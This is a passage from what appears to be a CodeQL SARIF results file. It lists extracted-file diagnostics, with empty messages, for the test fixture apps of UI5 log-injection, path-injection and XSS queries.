":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":347}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html","uriBaseId":"%SRCROOT%","index":348}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js","uriBaseId":"%SRCROOT%","index":349}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":350}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":351}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/package-lock.json","uriBaseId":"%SRCROOT%","index":352}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/package.json","uriBaseId":"%SRCROOT%","index":353}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/ui5.yaml","uriBaseId":"%SRCROOT%","index":354}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/index.js","uriBaseId":"%SRCROOT%","index":356}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/index.html","uriBaseId":"%SRCROOT%","index":357}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":358}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":360}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json","uriBaseId":"%SRCROOT%","index":362}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json","uriBaseId":"%SRCROOT%","index":363}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml","uriBaseId":"%SRCROOT%","index":364}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":365}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html","uriBaseId":"%SRCROOT%","index":366}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":367}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":368}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":369}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":370}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json","uriBaseId":"%SRCROOT%","index":371}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":372}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":373}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":374}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":375}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":376}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":377}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":378}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":379}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json","uriBaseId":"%SRCROOT%","index":380}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":381}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":382}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":383}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":384}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":385}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":386}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":387}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json","uriBaseId":"%SRCROOT%","index":388}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json","uriBaseId":"%SRCROOT%","index":389}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml","uriBaseId":"%SRCROOT%","index":390}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":391}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html","uriBaseId":"%SRCROOT%","index":392}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":393}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":394}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":395}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json","uriBaseId":"%SRCROOT%","index":396}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json","uriBaseId":"%SRCROOT%","index":397}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json","uriBaseId":"%SRCROOT%","index":398}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml","uriBaseId":"%SRCROOT%","index":399}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js","uriBaseId":"%SRCROOT%","index":400}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js","uriBaseId":"%SRCROOT%","index":401}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js","uriBaseId":"%SRCROOT%","index":402}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html","uriBaseId":"%SRCROOT%","index":403}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":404}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json","uriBaseId":"%SRCROOT%","index":405}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js","uriBaseId":"%SRCROOT%","index":406}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js","uriBaseId":"%SRCROOT%","index":407}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js","uriBaseId":"%SRCROOT%","index":408}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js","uriBaseId":"%SRCROOT%","index":409}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js","uriBaseId":"%SRCROOT%","index":410}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html","uriBaseId":"%SRCROOT%","index":411}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js","uriBaseId":"%SRCROOT%","index":412}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js","uriBaseId":"%SRCROOT%","index":413}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html","uriBaseId":"%SRCROOT%","index":414}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js","uriBaseId":"%SRCROOT%","index":415}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js","uriBaseId":"%SRCROOT%","index":416}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js","uriBaseId":"%SRCROOT%","index":417}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html","uriBaseId":"%SRCROOT%","index":418}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js","uriBaseId":"%SRCROOT%","index":419}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js","uriBaseId":"%SRCROOT%","index":420}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml","uriBaseId":"%SRCROOT%","index":421}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json","uriBaseId":"%SRCROOT%","index":422}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json","uriBaseId":"%SRCROOT%","index":423}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml","uriBaseId":"%SRCROOT%","index":424}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":425}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":426}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html","uriBaseId":"%SRCROOT%","index":427}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"f